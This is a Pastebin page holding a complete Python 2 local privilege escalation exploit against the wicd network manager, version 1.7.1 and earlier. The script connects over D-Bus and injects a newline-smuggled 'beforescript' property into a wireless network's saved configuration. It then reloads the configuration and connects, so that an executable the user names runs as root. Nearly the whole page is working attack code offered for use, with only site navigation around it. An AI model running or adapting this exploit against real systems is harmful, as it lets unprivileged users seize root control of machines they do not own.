API tools faq
paste
Advertisement
Topol

WICD Local Privilege Esclation Exploit

Topol
Aug 29th, 2012
106
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.58 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #wicd <= 1.7.1 0day exploit discovered on 4.9.12 by InfoSec Institute student
  3. #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
  4. import sys
  5. import os
  6. import time
  7. import getopt
  8.  
  9. try: from wicd import dbusmanager
  10. except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)
  11.  
  12. class Error(Exception):
  13.     def __init__(self, error):
  14.         self.errorStr=error
  15.      
  16.     def __str__(self):
  17.         return repr(self.errorStr)
  18.      
  19.  
  20. class Wicd():
  21.     wireless=None
  22.     daemon=None
  23.     versionString=None
  24.     def __init__(self):
  25.         try:
  26.             dbusmanager.connect_to_dbus()
  27.             dbusInterfaces  = dbusmanager.get_dbus_ifaces()
  28.             self.wireless       = dbusInterfaces["wireless"]
  29.             self.daemon     = dbusInterfaces["daemon"]
  30.         except:
  31.             raise Error("Daemon is not running")
  32.         self.versionString = self.daemon.Hello()
  33.      
  34.     def versionLessThan(self, version):
  35.         if int(self.versionString.replace(".",""))<=version:
  36.             return True
  37.         else:
  38.             return False
  39.      
  40.  
  41. class Exploit():
  42.      
  43.     def __init__(self, wicd, scriptPath):
  44.         self.wicd = wicd
  45.         self.scriptPath = scriptPath
  46.      
  47.     def getNets(self):
  48.         self.wicd.wireless.Scan(True)
  49.         nets = self.wicd.wireless.GetNumberOfNetworks()
  50.         while nets < 1:
  51.             self.wicd.wireless.Scan(True)
  52.             nets = self.wicd.wireless.GetNumberOfNetworks()
  53.         for net in range(nets):
  54.             yield net
  55.      
  56.     def exploit(self):
  57.          
  58.         for net in self.getNets(): pass # Priming scan.
  59.          
  60.         try:
  61.             self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
  62.         except:
  63.             raise Error("Unable to exploit (SetWirelessProperty() failed.)")
  64.          
  65.         try:
  66.             self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
  67.         except:
  68.             raise Error("Unable to exploit (SetWirelessProperty() failed.)")
  69.          
  70.         propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property
  71.         vulnIdentifier  = self.wicd.wireless.GetWirelessProperty(0, propertyKey)
  72.          
  73.         # TODO: Does this need a try construct?
  74.         self.wicd.wireless.ReloadConfig()
  75.          
  76.         for net in self.getNets(): # Implicit, but required re-scan.
  77.             if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
  78.                 self.wicd.wireless.ConnectWireless(net)
  79.                 return True
  80.         raise Error("Unable to exploit (Lost the network we were using)")
  81.      
  82.  
  83. def usage():
  84.     print "[!] Usage:"
  85.     print " ( -h, --help ):"
  86.     print "     Print this message."
  87.     print " ( --scriptPath= ): Required, executable to run as root."
  88.     print "     --scriptPath=/some/path/to/executable.sh"
  89.  
  90. def main():
  91.     print "[$] WICD =< 1.7.0Day"
  92.     try:
  93.         opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
  94.     except getopt.GetoptError, err:
  95.         # Print help information and exit:
  96.         print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
  97.         usage()
  98.         sys.exit(0)
  99.      
  100.     scriptPath=None
  101.      
  102.     for opt, arg in opts:
  103.         if opt in ("-h", "--help"):
  104.             usage()
  105.             sys.exit(0)
  106.         elif opt =="--scriptPath":
  107.             scriptPath=arg
  108.         else:
  109.             # I would be assuming to say we'll never get here.
  110.             print "[!] Parameter error."
  111.             usage()
  112.             sys.exit(0)
  113.      
  114.     if not scriptPath:
  115.         print "[!] Parameter error: scriptPath not set."
  116.         usage()
  117.         sys.exit(0)
  118.      
  119.     try:
  120.         wicd = Wicd()
  121.     except Error as error:
  122.         print "[!] WICD Error: %s" % (error.errorStr)
  123.         exit(0)
  124.     print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString)
  125.      
  126.     if not wicd.versionLessThan(171):
  127.         print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."
  128.      
  129.     exploit = Exploit(wicd, scriptPath)
  130.      
  131.     print "[*] Attempting to exploit:"
  132.      
  133.     try:
  134.         exploit.exploit()
  135.     except Error as error:
  136.         print "[!] Exploit Error: %s" % (error.errorStr)
  137.         exit(0)
  138.     print "[*] Exploit appears to have worked."
  139.  
  140. # Standard boilerplate to call the main() function to begin
  141. # the program.
  142. if __name__=='__main__':
  143.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!